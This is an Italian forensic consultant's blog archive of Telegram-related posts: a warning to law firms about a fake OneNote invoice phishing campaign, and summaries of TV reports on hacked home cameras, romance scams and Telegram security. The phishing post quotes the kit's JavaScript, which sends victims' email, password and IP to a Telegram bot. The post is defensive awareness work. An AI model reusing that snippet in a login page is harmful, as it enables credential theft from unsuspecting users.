Archivi tag: telegram

Attenzione al phishing che attacca le mailbox degli Avvocati

Un articolo che non parla d’informatica forense, come di consueto, ma è da leggere con attenzione e far girare in particolare tra gli avvocati: è importante saper riconoscere il phishing che sta colpendo gli studi legali italiani (e non solo) che porta a potenziali databreach a catena, dato che chi subisce l’attacco poi diventa vettore – verso i suoi contatti – di nuovi attacchi.

In questi giorni arrivano infatti agli avvocati email da parte di colleghi (ma anche clienti o collaboratori) che citano un documento di “Pagamento fattura” non allegato ma condiviso tramite OneNote, come mostrato nelle immagini allegate al post.

Email di phishing che arriva agli avvocati con un documento condiviso da aprire su OneNote

La mail ha come oggetto una frase tipo: “Studio Legale Associato XYZ ha condiviso la file Elementi condivisi il giorno 06-11-2025′ con te”.

Phishing ad avvocati e studi legali tramite falsa fattura condivisa su OneNote

Cliccando sul link si apre una pagina che indica che il documento contenente la fattura è crittografato ed è necessario loggarsi su Microsoft OneNote per accedervi:

"Avv. ABC - STUDIO LEGALE ASSOCIATO XYZ ho condiviso un nuovo documento con te
Pagamenti delle fattura.pdf(601 KB)
VISUALIZZARE IL DOCUMENTO CONDIVISO

Il documento è crittografato con password Microsoft, accedi con l'indirizzo e-mail in cui è stato ricevuto il documento.
Questo documento è stato analizzato alla ricerca di virus dal software Norton™ AntiVirus Security Standard 2025
© Condivisione di file Microsoft 2025"

Cliccando sul link “Visualizzare il documento condiviso” si giunge a una pagina con diversi login.

Phishing ad avvocati tramite condivisione fattura OneNote di Microsoft e furto credenziali username e password

E’ possibile inserire il proprio login con username e password per ogni tipo di account di posta elettronica che si possiede, partendo dai principali come Office365, Outlook, Rackspace, Aruba, PEC o anche altri account:

Accedi alla tua e-mail per visualizzare il documento condiviso.
Accedi qui sotto.
Accedi con Office365
Accedi con Outlook
Accedi con Rackspace
Accedi con Aruba Mail
Accedi con PEC
Accedi con Altra Posta

Inserendo le proprie credenziali ai vari link, queste vengono inviate agli attaccanti tramite una chiamata API a un bot Telegram:

forma.addEventListener("submit", e =>{ e.preventDefault(); let email = document.querySelector('#e-mail').value let pwd = document.querySelector('#pwd').value let ips = document.querySelector('#ipaddress').value fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=Email:${email}=Password:=${pwd}=IP:=${ips}`, { method: "GET" }).then(success => { window.location.replace("https://www.onenote.com/"); }, error => { alert("Message not sent") console.log(error) })

In sostanza, gli attaccanti, per scaricare il file chiedono d’inserire su un finto sito Microsoft username e password di posta (Office365, Outlook, Rackspace, Aruba S.p.A., PEC o anche qualunque altra) ma ovviamente una volta loggati invece di mostrare la fattura:

1) gli attaccanti entrano nell’account di posta dello Studio;

2) se hanno tempo e voglia scaricano i messaggi e gli allegati;

3) scaricano la rubrica e inviano a tutti i contatti la stessa mail ricevuta sperando che anche loro si facciano trarre in inganno..

Le email che arrivano sono originali e autentiche, inviate dal vero account del collega avvocato, non sono spoofing e tendono a passare i controlli antispam, quindi l’unica prevenzione è non inserire la password al link con il documento condiviso. Se cliccate su link e andate avanti senza inserire credenziali non succede nulla.

Se avete già inserito user/password, gli attaccanti stanno potenzialmente scaricandosi i vostri messaggi, la rubrica e inviando ai vostri contatti lo stesso messaggio: cambiate subito password, loggatevi sulla webmail per chiudere eventuali altre sessioni aperte, attivate 2FA se già non lo avete, valutate se informare i contatti di non aprire link da voi ricevuti, se volete capire cosa hanno fatto gli attaccanti nel vostro account scaricate/chiedete i file di log del provider.

Se avete ricevuto mail simili a quelle allegate al post quindi cancellatele anche se provengono da colleghi oppure se avete voglia inviatemi il file EML che ne sto collezionando diversi per analizzare come il phishing sta diffondendosi tra i professionisti e quali tecniche utilizzano gli attaccanti per rendere credibile il phishing.

Indagine sulle telecamere di sorveglianza hackerate per TV7 su Rai1

In qualità di consulente informatico forense, ho avuto il piacere di contribuire a un importante servizio andato in onda su TV7, che ha acceso i riflettori su un fenomeno tanto diffuso quanto inquietante: la violazione dei sistemi di videosorveglianza e la conseguente vendita di immagini private online oppure delle credenziali di accesso, cioè nome utente e password, che permettono a chiunque di entrare virtualmente nelle case e spiare le persone a loro insaputa.

Paolo Dal Checco per Rai1 su TV7 nel servizio sulle telecamere di sorveglianza vendute su Telegram

Il caso, che ha preso spunto dalla vicenda del conduttore Stefano De Martino, ha messo in luce come migliaia di video, rubati da telecamere che persone comuni installano nelle proprie abitazioni, finiscano su siti web e canali Telegram. Durante il servizio, in qualità di consulente tecnico ho mostrato come questi contenuti, spesso di natura estremamente intima e ripresi in camere da letto, bagni o studi medici, siano facilmente accessibili.

Le indagini digitali dietro la violazione della privacy

Il mio intervento ha avuto l’obiettivo di spiegare le dinamiche tecniche che consentono a un hacker di violare questi sistemi. Spesso, il problema risiede in configurazioni di sicurezza deboli o del tutto assenti. Un malintenzionato effettua una scansione della rete alla ricerca di dispositivi vulnerabili e, una volta individuati, tenta di accedere utilizzando password banali come “admin” o “1234”, oppure impiegando strumenti specifici che testano un numero enorme di combinazioni in pochi secondi.

Polizia di Stato e indagini sulle telecamere in vendita su Telegram

Il fenomeno non è nuovo. Già anni fa, l’operazione “Rear Window” della Polizia Postale aveva smantellato gruppi criminali italiani che hackeravano telecamere ipcam in tutto il mondo per rivendere i video o le credenziali ai compratori con pagamento anche tramite criptomonete.

Queste investigazioni digitali hanno rivelato un vero e proprio mercato nero dove è possibile acquistare non solo filmati, ma anche abbonamenti per ottenere le credenziali di accesso e spiare le vittime in tempo reale, pagando in criptovalute come Bitcoin o Monero, oppure tramite PayPal.

Il ruolo della consulenza tecnica forense

In casi come questi, la figura del consulente tecnico forense diventa cruciale. Le indagini informatiche partono spesso dal repertamento delle prove digitali. Ad esempio, l’analisi dei dispositivi sequestrati ai criminali, come avvenuto nell’operazione della Polizia Postale, ha permesso di scoprire cartelle contenenti immagini carpite illegalmente.

Telcamere IPcam hackerate e in vendita nel dark web

Il mio lavoro come CTP informatico (Consulente Tecnico di Parte) o come CTU informatico (Consulente Tecnico d’Ufficio) per Procure e Tribunali consiste proprio nell’analizzare questi dati. Attraverso la creazione di una copia forense (o immagine forense) dei dispositivi, garantisco che l’evidenza digitale non venga alterata, preservandone l’integrità tramite l’uso di hash e marche temporali. Questo processo è fondamentale per assicurare che le prove siano ammissibili in un processo penale.

Dalle abitazioni ai luoghi pubblici: un rischio sottovalutato

Il servizio televisivo al quale ho partecipato come consulente tecnico informatico forense ha evidenziato come il rischio non si limiti alle abitazioni private. Abbiamo visto esempi di telecamere nascoste in centri benessere, studi medici e spogliatoi di palestre. In un caso specifico a Roma, le microcamere erano state occultate in un armadietto, in un orologio e in un borsone all’interno dello spogliatoio femminile, registrando centinaia di ore di filmati, anche di minorenni.

Servizio TV sulle telecamere private con video e password in vendita su Telegram

Le vittime, spesso, non sanno di essere spiate, il che complica enormemente le indagini e i procedimenti legali. Quando una vittima sporge denuncia, il lavoro del perito forense o dell’investigatore digitale è quello di ricostruire i fatti, identificare i responsabili e cristallizzare le prove.

Come difendersi: consigli pratici

La facilità con cui oggi si acquistano e installano sistemi di videosorveglianza “fai da te” ci espone a rischi enormi se non si adottano le giuste precauzioni. Durante l’intervista ho sottolineato alcuni punti fondamentali:

  1. Posizionamento strategico: Le telecamere di sicurezza andrebbero installate preferibilmente all’esterno (terrazzi, balconi, giardini) per intercettare un intruso prima che entri. Evitare di puntarle su zone sensibili come la camera da letto.
  2. Cambiare le password: Mai lasciare le credenziali di default. È il primo e più semplice varco per un hacker.
  3. Consapevolezza: Un dispositivo connesso a Internet è potenzialmente visibile da chiunque. È importante essere consapevoli che, anche se il sito o il canale Telegram dove finiscono i video viene chiuso, chi ha già scaricato quel materiale può continuare a diffonderlo.

La consulenza informatica forense non è solo un supporto reattivo a un crimine già commesso, ma può avere un ruolo proattivo nella cosiddetta forensic readiness, aiutando aziende e privati a prevenire incidenti di questo tipo.

La strada per ottenere giustizia è spesso lunga e difficile per le vittime, come testimoniato nel servizio. Per questo, il lavoro del perito del tribunale e dei consulenti di parte deve essere meticoloso e inattaccabile, per fornire agli inquirenti e ai giudici tutti gli elementi necessari a fare chiarezza.

Se avete subito una violazione della privacy o necessitate di una consulenza tecnica forense, non esitate a contattarmi utilizzando il modulo di contatto, scrivendo una mail all’indirizzo che trovate nella pagina contatti dello Studio d’Informatica Forense o telefonando direttamente durante gli orari di lavoro.

Sulle tracce dei truffatori con Le Iene

Lunedì 18 novembre 2024 è andato in onda un servizio di Roberta Rei per Le Iene sulle truffe sentimentali (note anche come romance scam o love fraud) al quale ho dato un piccolo contributo d’indagine informatica come consulente tecnico delle Iene portando l’esperienza accumulata in numerosi casi reali nei quali i clienti mi hanno contattato in qualità di CTP informatico perché vittime di questo tipo di raggiri.

Paolo Dal Checco e Roberta Rei a Le Iene

Il servizio TV per il quale mi sono prestato come consulente informatico forense de Le Iene ripercorre la truffa sentimentale subita da una vittima fino a ricostruire le modalità con le quali è avvenuta, dal contatto iniziale alla richiesta di versare fondi su conti correnti o tramite gift card.

Chi ha subito truffe ha, in genere, la necessità tramite indagine forense di cristallizzare in maniera forense le comunicazioni intercorse con i delinquenti, rintracciare i fondi versati, identificare ove possibile i soggetti che in genere operano con numeri VoIP e relativi account Whatsapp, Telegram o Facebook Messenger, mail anonime e spesso anche VPN o rete Tor.

Spesso emerge quindi l’esigenza di una perizia informatica finalizzata proprio all’acquisizione forense delle prove digitali, essenziale per poter dimostrare quanto avvenuto e tentare l’identificazione di coloro che hanno operato il raggiro oltre, ove possibile, a identificare dove sono confluiti i fondi. Va precisato che entrambe le attività d’indagine informatica (identificazione e rintracciamento delle somme di denaro) raramente portano a risultati concreti, vista l’abilità con la quale i criminali si nascondono dietro VPN o riciclano i proventi illeciti anonimizzando le transazioni.

Paolo Dal Checco a Le Iene nel servizio TV sulle Truffe Sentimentali

Durante il servizio nel quale mi sono prestato come perito informatico forense de Le Iene per l’investigazione digitale sulla truffa, la bravissima Roberta Rei mi ha posto alcune domande sul tracciamento degli indirizzi IP dei truffatori, che in alcuni casi permette di localizzare la zona dalla quale stanno operando o quantomeno classificare il tipo di anonimato dietro il quale si nascondono mentre scrivono tramite Facebook Messenger oppure Whatsapp.

Nel servizio dove ho dato il mio piccolo contributo d’indagine digitale come esperto informatico de Le Iene ho parlato anche delle modalità con le quali i delinquenti provvedono al riciclaggio dei proventi illeciti delle truffe amorose tramite buoni regalo (es. gift card di Steam, Apple iTunes, Google Play, etc…) oppure bonifici verso money mule o ancora trasferimenti irreversibili mediante criptomonete di cui fanno cash out magari dopo essere passati attraverso mixer/tumbler/DEX.

Riciclaggio tramite gift card di proventi illeciti di truffe a Le Iene

Per identificare questo tipo di truffa, spesso è sufficiente – come indicato nel reportage TV de le Iene nel quale ho svolto consulenza informatica forense – utilizzare servizi come Google Reverse Image Search per verificare le immagini utilizzate dai truffatori come profilo social oppure inviate alle vittime come prova della loro situazione provengono da siti pubblici e quindi nascondono la vera identità dell’interlocutore.

Purtroppo ci sono pochissime difese tecniche a questo tipo di scam: la migliore è la prevenzione, anche grazie a questo tipo di servizi, al fine di rendere le potenziali vittime consapevoli dei rischi che corrono a dare credito e fiducia a chi contatta sui social spacciandosi per qualcuno interessato a intrattenere una relazione amorosa, evitando però nel contempo le videocall, chiedendo invece soldi o ricariche tramite buoni spesa, promettendo incontri o una vita insieme quando in realtà dietro c’è con buona probabilità un’organizzazione di truffatori preparati anche psicologicamente ad ammaliare la vittima e non lasciarla andare.

Intervista al TG1 sulla sicurezza informatica di Telegram

Oggi è andato in onda su RaiUno, al TG1 Mattina Estate, un servizio su Telegram, gli aspetti di sicurezza informatica della piattaforma di instant messaging e social network Telegram e sulla vicenda che ha riguardato il suo fondatore Pavel Durov.

All’interno del servizio del TG1 andato in onda su RaiUno è presente una mio piccolo intervento sulle questioni tecniche che differenziano Telegram dalle altre piattaforme come Whatsapp, Facebook, Instagram, TikTok, etc… e che hanno probabilmente contribuito alla vicende giudiziarie di cui il fondatore della piattaforma è stato protagonista qualche giorno fa in Francia.

Telegram risulta particolarmente interessante per chi cerca anonimato perché permette di slegare l’utenza dal proprio numero di telefono o indirizzo di posta elettronica, permette l’utilizzo tramite proxy/vpn/Tor e non risente di censura, richieste giudiziarie, sequestri e chiusure di utenze, gruppi e canali dato che la politica della piattaforma è quella di non interferire con la libertà di espressione degli utenti.

A questo si aggiunge il fatto che Telegram non abilita di default la cifratura end-to-end sulle chat, non ne permette l’attivazione sui gruppi e mantiene tutti i dati non cifrati end-to-end sui propri server. In informatica forense, questo aspetto implica una maggior difficoltà di accesso ai dati locali sui dispositivi durante la copia forense, dato che non esiste un database completo ma le chat Telegram sono localmente presenti in una sorta di “cache” che mantiene gli ultimi messaggi o quelli comunque visionati dall’utente.

TG1 Estate Mattina - Telegram, sicurezza e informatica forense

Durante le perizie informatiche, la piattaforma Telegram è spesso protagonista di analisi forense dato che presenta questioni complesse legate alla cifratura delle comunicazioni, al cloud, all’accesso al database. Le indagini digitali tramite tecniche d’informatica forense su Telegram sono quindi particolarmente complesse perché si uniscono diverse problematiche, oltre alla cifratura e all’anonimato, rendendo quindi piuttosto complessa l’identificazione dei soggetti, la loro utenza, indirizzi IP e men che meno possibili elementi anagrafici.

Durante la breve intervista al TG1 ho presentato, in poche parole, le questioni relative alla cifratura e all’archiviazione che possono aver – a mio avviso – influito nella decisione della Francia di fermare il fondatore della piattaforma quantomeno per chiarimenti o richieste di collaborazione.

Il servizio del TG1 Mattina Estate su Telegram e Pavel Duro è visionabile, previo accesso a RaiPlay, al link Telegram, le insidie dei social al minuto 54:38,

Con le Iene su videocamere di sorveglianza spiate nei gruppi Telegram

Martedì 31 gennaio 2023 è andato in onda il servizio de Le Iene cui ho dato un piccolo contributo in qualità di perito informatico de le Iene facendo ricerche e analisi tecniche sulle telecamere di sorveglianza che spesso si trovano installate a casa o in ufficio. Matteo Viviani e Marco Fubini nel servizio TV per Le Iene hanno mostrato come gli accessi riservati alle webcam e i video privati registrati abusivamente da perfetti sconosciuti sono diventati merce di scambio o di vendita in diversi gruppi e canali Telegram liberamente raggiungibili.

Paolo Dal Checco a Le Iene con Matteo Viviani su Webcam Spia e Telegram

Nel corso del servizio dove ho svolto il compito di consulente informatico delle Iene emerge, partendo dalla testimonianza di un utente Telegram, come esistano gruppi più o meno segreti che condividono nomi utente e password di telecamere ipcam di sorveglianza installate nelle case delle persone, nei giardini, negli uffici o nei magazzini, nei negozi, nelle sale massaggio e ovunque qualcuno ritenga utile monitorare da remoto ciò che accade.

Il problema è che gli accessi a queste webcam CCTV di sorveglianza vengono in qualche modo scoperti, a causa di password deboli o default, facili da indovinare o note perché ogni produttore di telecamere ne usa una standard. Una volta scoperti, questi accessi vengono convertiti in qrcode così da poter essere facilmente condivisi su gruppi Telegram e importati in App di videosorveglianza come Safire Connect, HikConnect, HiLook, ProControl+, Guarding Vision o altre, più o meno compatibili fra loro.

Una volta importati i qrcode delle videocamere IPCAM, spesso non serve altro per visionare interi appartamenti, aziende, negozi, camerini, sale massaggi, camere da letto o bagni di persone ignare che la loro vita privata è diventata pubblica. Non solo, i partecipanti ai canali e gruppi Telegram che scambiano spycam e cctv registrano 24 ore al giorno i video e scelgono i frammenti più riservati, per condividerli e venderli sempre tramite qrcode spesso associato anche a password semplici oppure a password preimpostate nelle telecamere.

Gruppi Telegram che scambiano qrcode e password di telecamere di sorveglianza spiate

Questi gruppi Telegram dove gli utenti si scambiano qrcode o password di telecamere di sorveglianza iptv spiate sono numerosi e contano ognuno anche decine di migliaia di persone, che sono incentivate a condividere codici privati di telecamere di sorveglianza trovati in rete o in altri gruppi per poter rimanere all’interno. I qrcode scambiati dai partecipanti per accedere alle videocamere cctv vengono poi utilizzati su App di videosorveglianza IP per Android o iOS come Safire Connect, HikConnect, HiLook, ProControl+, Guarding Vision o altre, più o meno compatibili fra loro.

Nel corso del servizio nel quale ho svolto attività di perizia informatica per Le Iene un utente di questi gruppi Telegram di scambio qrcode delle cam private racconta cosa ha visto e come funzionano: chi entra nei gruppi viene invitato a condividere codici, qrcode, indirizzi di cam di sorveglianza per poter rimanere all’interno. Alcuni gruppi chiedono, per l’ingresso, di fare pubblicità al gruppo stesso, così da aumentare il numero di partecipanti e lo scambio di spy cam private, spesso posizionate in luoghi altamente riservati come camere da letto, bagni, camerini, camere dei bimbi o culle. Molte webcam vengono accedute dai partecipanti direttamente dalle aree cloud dei proprietari, così da poter scaricare anche i video dei giorni precedenti e salvare le scene più compromettenti, da condividere o vendere sempre su Telegram.

I gruppi Telegram non sono la unica fonte di qrcode, id di telecamere, indirizzi IP e password, è possibile ricavare numerose webcam pubbliche e aperte anche tramite sistemi come Shodan, che scandagliano la rete alla ricerca d’indirizzi IP vulnerabili o con porte aperte che permettono l’ingresso anche di sconosciuti.

Trovare webcam aperte di sorveglianza pubbliche a Milano tramite Shodan

Con una semplice ricerca sulla piattaforma OSINT nota come Shodan si possono trovare centinaia di webcam aperte e pubbliche anche solo su Milano. Le telecamere pubbliche accessibili tramite il servizio online Shodan sono in genere meno private rispetto a quelle condivise su Telegram ma sono forse più pericolose perché chiunque può accedervi, è sufficiente accedere al sito web senza bisogno di utilizzare username o password.

Tra l’altro, è sempre più frequente che vengano richieste perizie informatiche su sistemi di videosorveglanza, DVR, NVR, videocamere iptv, cctv che hanno registrato scene di un crimine o che devono essere utilizzate come prova digitale a valore legale per uso in Tribunale in un processo civile o penale: lo Studio eroga servizi di questo tipo ed è disponibile tramite la pagina Contatti a ricevere eventuali richieste di supporti in qualità di CTP informatico.

I consigli per evitare di essere spiati tramite le proprie webcam sono semplici e spesso basati su buon senso:

  1. Aggiornare il firmware delle webcam, in modo da renderle più sicure ad attacchi dall’esterno;
  2. Non lasciare le password di default, cioè quelle preimpostate in modo standard sulle telecamere di sorveglianza IP o WiFi, ma scegliere password complicate e lunghe (evitando nomi, anni di nascita, etc… ma inserendo lettere maiuscole, minuscole e caratteri speciali);
  3. Non comunicare le credenziali di accesso a nessuno, via email o su siti web;
  4. Verificare se le luci a infrarosso e i led delle telecamere si accendono di notte;
  5. Non posizionare le telecamere di sorveglianza in camere da letto, camere dei bimbi, bagni o luoghi dove si si può trovare in momenti privati della propria vita;
  6. Se disponibile, osservare ogni tanto l’elenco degli accessi per verificare che non vi siano login di sconosciuti sulle webcam di rete o wireless;
  7. Verificare periodicamente sul sito Shodan se il proprio indirizzo IP risulta avere servizi vulnerabili o aperti al pubblico;
  8. Verificare se la propria password è sicura su siti come HaveIBeenPwned;
  9. Utilizzare ove possibile – in genere nel cloud – autenticazione a due fattori, con conferma di login via SMS o Auth App;
  10. Spegnere le telecamere di notte, quando si è in casa o quando non servono, eventualmente staccando la rete wifi oppure utilizzando la funzione di alcuni modem (es. il router wifi EERO di Amazon) che permette di isolare temporaneamente alcuni gruppi di dispositivi.

Il video integrale del servizio TV per le Iene – con il piccolo contributo tecnico del Consulente Informatico Forense Paolo Dal Checco – sulle videcamere di sorveglianza che i membri di gruppi Telegram o gli utenti di piattaforme come Shodan possono utilizzare da remoto per spiare dentro casa, scambiando qrcode, link di accesso o video registrati, è visibile sul sito Mediaset de Le Iene.